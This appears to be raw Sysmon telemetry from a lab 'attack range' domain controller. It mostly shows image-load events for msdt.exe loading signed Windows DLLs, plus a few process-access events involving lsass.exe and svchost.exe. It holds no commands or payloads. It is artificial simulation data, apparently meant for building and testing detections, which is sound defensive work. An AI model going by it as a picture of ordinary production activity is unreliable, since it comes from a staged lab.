10341000x800000000000000099009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-C0CE-6294-360B-000000005502}6728C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FAtrueMicrosoft WindowsValid 734700x800000000000000099007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000099006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.812{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\wer.dll10.0.14393.4704 (rs1_release.211004-1917)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwer.dllMD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADCtrueMicrosoft WindowsValid 734700x800000000000000099005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\cabinet.dll5.00 (rs1_release.160715-1616)Microsoft® Cabinet File APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcabinet.dllMD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951trueMicrosoft WindowsValid 734700x800000000000000099004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\dui70.dll10.0.14393.4169 (rs1_release.210107-1130)Windows DirectUI EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUI70.DLLMD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853trueMicrosoft WindowsValid 734700x800000000000000099003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62trueMicrosoft WindowsValid 734700x800000000000000099002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260FtrueMicrosoft WindowsValid 734700x800000000000000099001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\duser.dll10.0.14393.0 (rs1_release.160715-1616)Windows DirectUser EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUser.DLLMD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0trueMicrosoft WindowsValid 734700x800000000000000098999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52ADtrueMicrosoft WindowsValid 734700x800000000000000098998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519trueMicrosoft WindowsValid 734700x800000000000000098997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6trueMicrosoft WindowsValid 734700x800000000000000098996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567CtrueMicrosoft WindowsValid 734700x800000000000000098992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46trueMicrosoft WindowsValid 734700x800000000000000098991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744CtrueMicrosoft WindowsValid 734700x800000000000000098990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000098989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAFtrueMicrosoft WindowsValid 734700x800000000000000098988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86trueMicrosoft WindowsValid 734700x800000000000000098987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.796{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exeMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35trueMicrosoft WindowsValid 734700x800000000000000098983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\windows.storage.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAFtrueMicrosoft WindowsValid 734700x800000000000000098982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89trueMicrosoft WindowsValid 734700x800000000000000098981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.765{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\shell32.dll10.0.14393.5125 (rs1_release.220429-1732)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90DtrueMicrosoft WindowsValid 734700x800000000000000098980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-C0CE-6294-360B-000000005502}6728C:\Windows\System32\msdt.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x800000000000000098969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:14.749{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 